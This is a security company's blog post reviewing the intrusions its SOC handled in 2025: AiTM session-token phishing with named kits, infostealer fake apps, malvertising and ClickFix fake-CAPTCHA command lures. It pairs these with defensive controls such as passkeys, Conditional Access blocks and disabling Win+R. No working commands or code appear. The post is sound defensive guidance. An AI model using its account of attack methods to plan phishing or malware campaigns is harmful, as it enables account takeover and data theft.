Insights

Introduction

An organisation is best placed to defend against cyber‑attacks when it understands how attackers actually break in. With that in mind, here’s a brief review of the major incidents that the Chorus Cyber Security Operations Center (CSOC) handled in 2025 – and, crucially, what every organisation can learn from them.

This analysis covers every real‑world incident that triggered incident response (IR) involvement within Chorus Cyber. That doesn’t always mean a customer under monitoring was fully compromised; it includes cases where data was exfiltrated, exfiltration was possible but prevented, or our response was faster than the attacker, and a breach was averted. (We’ve omitted unannounced penetration tests to keep findings relevant).

Because the vast majority of our customers are ≤1,000 seats, these data points offer a unique window into the tactics that succeed against SMBs – and the practical controls that most effectively stop them.

Account Compromise

Phishing is still the primary risk for SMBs

This category was the largest by far – 68% of all breaches – and 95% of those were Adversary‑in‑the‑Middle (AiTM) attacks that steal session tokens, allowing accounts to be phished even if protected by certain types of MFA (i.e SMS, Email OTP, Push Notifications). AiTM kits are ubiquitous and inexpensive; open‑source tools like Modlishka, Evilginx and Muraena lower the technical barrier, making successful campaigns accessible to less‑skilled actors, and there are several AiTM kits for hire for around $75 USD per month, which even include customer service.

For customers in our CSOC, near real‑time detection + automated response typically limits the attacker’s window to 7-10 minutes (log ingestion dependent). That is still enough time for a motivated actor to attempt mailbox scraping or quick exfiltration – and social‑engineering lures remain persuasive.

The overlooked reality

What is often neglected is that there are several easy ways to make your organisation more resilient to this type of attack, and a shocking 60% of these successful AiTM attacks are low level, opportunistic, spray-and-pray type attacks. It’s true that a motivated attacker can use a VPN to appear as though they are in the same country as the victim, and they can manipulate their user agent string to pretend that they are signing in from a Windows 11 device, but the reality of what we see is that attackers, well, don’t.

We still see a large proportion of low‑effort attacks: 60% either include sign‑ins from US‑based IP pools or feature unchanged/non‑spoofed agent strings, or, in many cases, both. In practice, simple CA policies (unsupported platforms + geo‑blocks) would have prevented the majority of these opportunistic intrusions – with minimal disruption to users.

No single control is 100% effective. The objective is friction: raise the cost of compromise, so attackers move on to easier targets.

Mitigations that work (and why many teams skip them)

Phishing‑resistant MFA (passkeys/FIDO2): Rolling out passkeys materially raises the bar for token theft and relay attacks. Start with Microsoft Entra ID’s passkey method and Authenticator support.

• Enable passkeys for your organisation: Microsoft Learn – Entra ID
• Overview of passkeys in Entra ID: Concepts

Conditional Access (CA) constraints with low user impact:

• Block unknown/unsupported device platforms to cut out opportunistic sign‑ins that present as Linux or non‑standard user agents. Policy template
• Geo‑blocking for countries where you have no operations. This simple control eliminates large volumes of spray‑and‑pray attempts. Block by location

Malware

Roughly 30% of breaches fell into the malware category. Most were fake apps: “free” PDF editors, browsers or useful utilities with infostealer capabilities that quietly harvest credentials, tokens and browser data while providing basic functionality. Adversaries drive distribution via SEO poisoning and malvertising; we even saw malicious artifacts hosted on trusted platforms (e.g., impersonated Docker images).

Why Threat Hunting matters for SMBs

These fake apps are very good at evading AV and EDR tools, as they appear legitimate. Many customers would not have known they were affected without proactive Threat Hunting – one reason frameworks and regulations (e.g., NIS2.0) increasingly emphasise continuous detection through threat hunting.

ClickFix is the year’s standout technique

In H2 2025, ClickFix surged: ClickFix is an astonishingly simple attack, where a fake CAPTCHA instructs a user to copy a malicious command into the Windows Run box through the shortcut Windows + R. This malicious command then directly installs malware, infostealers or Remote Access Trojans (RATs) on to the victim’s machine.

In Microsoft’s Digital Defence Report 2025, ClickFix was the most common initial access method that Microsoft Defender Experts observed in Defender Expert notifications in the last year, accounting for 47% of attacks. With open source ClickFix kits available on Github, this is a trend we expect to see rise in popularity into 2026, although the good news is that detection is working well here, with the vast majority of ClickFix attempts blocked on sight.

Practical hardening

• Disable the Run dialog (Win+R) and remove “Run” from Start for non‑admin users via Intune configuration profiles or Group Policy. This is low‑impact for most roles and directly targets ClickFix’s “single‑command” workflow.
• Application allow‑listing and software provisioning to reduce the temptation to download risky “free tools”.
• User education focused on malvertising/SEO lures and “copy‑this‑command” prompts.

Targeting

Charities and Not‑for‑Profits experienced the most breaches in our data. Budget constraints, a high proportion of BYOD volunteers, and high‑value personal data make these organisations attractive – and comparatively soft targets.

What to do now: a practical baseline

1. Enable phishing‑resistant MFA (passkeys) and prioritise administrators and finance/HR staff. Start here: Enable passkeys with Entra ID
2. If you haven’t already done so – Enforce Conditional Access policies that:
   1. Block unknown/unsupported platforms (template)
   2. Block sign‑ins from non‑operating countries/regions (policy)
3. Harden endpoints against ClickFix: disable Win+R for standard users; monitor clipboard and PowerShell/Run execution patterns; reinforce user training. Microsoft Security Blog-ClickFix
4. Implement allow‑listing and trusted software catalogs; monitor for SEO/malvertising‑driven downloads.
5. Invest in Threat Hunting (internal or managed) to surface infostealers and quiet persistence before data theft.
6. Plan for BYOD realities: use app protection and device compliance for Microsoft 365 apps; apply exception‑light policies that still reduce token‑theft risk.

Conclusion

2025 reminded us that most successful compromises are simple: session‑token theft through AiTM, one‑line malware installs via ClickFix, and malvertising that convinces users to “just get the job done.” The strongest defences are similarly straightforward:

• Strengthen MFA to phish-resistant types.
• Apply geo + platform blocks that remove entire classes of opportunistic sign‑ins.
• Remove easy execution paths (Win+R, unmanaged PowerShell) and reinforce user judgement.
• Back it up with Threat Hunting, Managed Detection & Response (MDR/MXDR) and rapid IR, so missteps don’t become breaches.

None of these controls is perfect on its own – but together, they raise the cost of attack and shrink the attacker’s window to minutes, which is often the difference between “incident contained” and “breach disclosed.” The organisations that adopt this baseline now will enter 2026 with fewer alerts, faster recovery, and far less material risk. The lesson for all SMBs: controls must reflect real‑world attack paths.